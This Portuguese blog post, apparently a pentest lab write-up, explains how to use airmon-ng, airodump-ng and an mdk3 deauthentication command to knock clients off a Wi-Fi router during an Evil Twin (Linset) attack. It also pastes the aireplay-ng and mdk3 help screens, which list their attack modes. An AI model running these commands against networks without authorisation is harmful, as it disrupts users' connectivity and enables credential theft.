QUEBRA DE WIFI USANDO O EVIL TIWN ATTACK (LINSET)
Este post descreve uma forma simples em usar métodos
auxiliares de um Pentest Wifi, isto ao que tange o uso do Linset ou outra
aplicação do gênero. Este poste não visa ensinar a usá-lo, restringe-se apenas
em demonstrar uma forma auxiliar para manter os clientes do AP (access
point - roteador), desconectado. Também não será explanado nenhum comparativo entre
o Aireplay ou MDK3. Vale ressaltar que já existe outros métodos de penetração
mais eficiente, mas este ainda é adotado pela sua facilidade e por usar as
mesmas técnicas do Pineapple Wifi (Alan Turing).
Para este LAB:
- Workstation VM
- Wifislax
- Dois adaptadores Wifi.
SITUAÇÃO:
Em determinado Pentest, foi detectado uma ineficiência no
Aireplay e o MDK3, então foi iniciado outra instância na VM rodando o Wifislax,
desta vez para verificar se havia dispositivos conectados no Roteador.
Com duas instâncias VMs rodando o Wifislax (sistema
operacional usado para quebra de wifi), use os seguintes comandos:
PRIMEIRO COMANDO:
1 - Digite: airmon-ng start wlan0
Este comando habilita o modo monitor e cria uma interface
comumente denomindada de mon0 você verá a seguinte saída:
Interface
Chipset Driver
wlan0 Ralink
RT2870/3070 rt2800usb - [phy14]
(monitor mode
enabled on mon0)
Esta saída representa que o seu adaptador usb wifi está em
modo monitor, instalado e pronto para uso.
SEGUNDO COMANDO:
Digite este comando: airodump-ng mon0
Este comando é usado como sniff de rede wifi, necessário
para conseguir o MAC, o canal e saber se há clientes conectados na rede wifi.
TERCEIRO COMANDO:
Digite este comando: airodump-ng --bssid xx:xx:xx:xx:xx:xx
--channel AA --write AABBZZ mon0
X : é o mac do roteador usado para o pentest
AA: é o canal do respectivo roteador.
AABBZZ: é o nome do arquivo de captura, pode ser visualizado
pelo wireshark.
Diante dessas informações, é possível usar Aireplay ou MDK3
para forçar a queda dos clientes ativos no roteador sem fio.
Help Aireplay:
Aireplay-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe
http://www.aircrack-ng.org
usage: aireplay-ng
<options> <replay interface>
Filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods
: frame control, To DS bit
-f fromds :
frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection
Attack modes
(numbers can still be used):
--deauth count : deauthenticate 1 or all stations
(-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive
frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a
client for new IVs (-6)
--cfrag : fragments against a client (-7)
--migmode : attacks WPA migration mode (-8)
--test : tests injection and quality
(-9)
--help : Displays this usage screen
Além do Aireplay, é possível utilizar o MDK3,
particularmente, tenho preferência nele.
MDK3
Considerando a forma sucinta, utilizou-se para o fim que se
destina este post o comando abaixo:
mdk3 mon0 d -i XX:XX:XX:XX:XX
Onde o xx é o MAC do roteador em questão.
Após digitar o comando, a sua saída estará da seguinte forma:
Disconnecting between: AA:AA:AA:AA:AA:AA and:
AA:AA:AA:AA:AA:AA
Onde o xx é o MAC dos clientes (celulares e dispositivos sem
fio conectados ao roteador) em questão.
É possível consulta o seu help logo abaixo:
MDK 3.0 v6 - "Yeah, well, whatever"
by ASPj of k2wrlz, using the osdep library from aircrack-ng
And with lots of help from the great aircrack-ng community:
Antragon, moongray, Ace, Zero_Chaos, Hirte, thefkboss,
ducttape,
telek0miker, Le_Vert, sorbo, Andy Green, bahathir and Dawid
Gajownik
THANK YOU!
MDK is a proof-of-concept tool to exploit common IEEE 802.11
protocol weaknesses.
IMPORTANT: It is your responsibility to make sure you have
permission from the
network owner before running MDK against it.
This code is licenced under the GPLv2
MDK USAGE:
mdk3 <interface> <test_mode> [test_options]
Try mdk3 --fullhelp for all test options
Try mdk3 --help <test_mode> for info about one test
only
TEST MODES:
b - Beacon Flood
Mode
Sends beacon
frames to show fake APs at clients.
This can
sometimes crash network scanners and even drivers!
a - Authentication
DoS mode
Sends
authentication frames to all APs found in range.
Too much clients
freeze or reset some APs.
p - Basic probing
and ESSID Bruteforce mode
Probes AP and
check for answer, useful for checking if SSID has
been correctly
decloaked or if AP is in your adaptors sending range
SSID
Bruteforcing is also possible with this test mode.
d - Deauthentication
/ Disassociation Amok Mode
Kicks everybody
found from AP
m - Michael shutdown
exploitation (TKIP)
Cancels all
traffic continuously
x - 802.1X tests
w - WIDS/WIPS
Confusion
Confuse/Abuse
Intrusion Detection and Prevention Systems
f - MAC filter
bruteforce mode
This test uses a
list of known client MAC Adresses and tries to
authenticate
them to the given AP while dynamically changing
its response
timeout for best performance. It currently works only
on APs who deny
an open authentication request properly
g - WPA Downgrade
test
deauthenticates
Stations and APs sending WPA encrypted packets.
With this test
you can check if the sysadmin will try setting his
network to WEP
or disable encryption.
Por fim, atingimos a finalidade deste post.
Nenhum comentário:
Postar um comentário
Observação: somente um membro deste blog pode postar um comentário.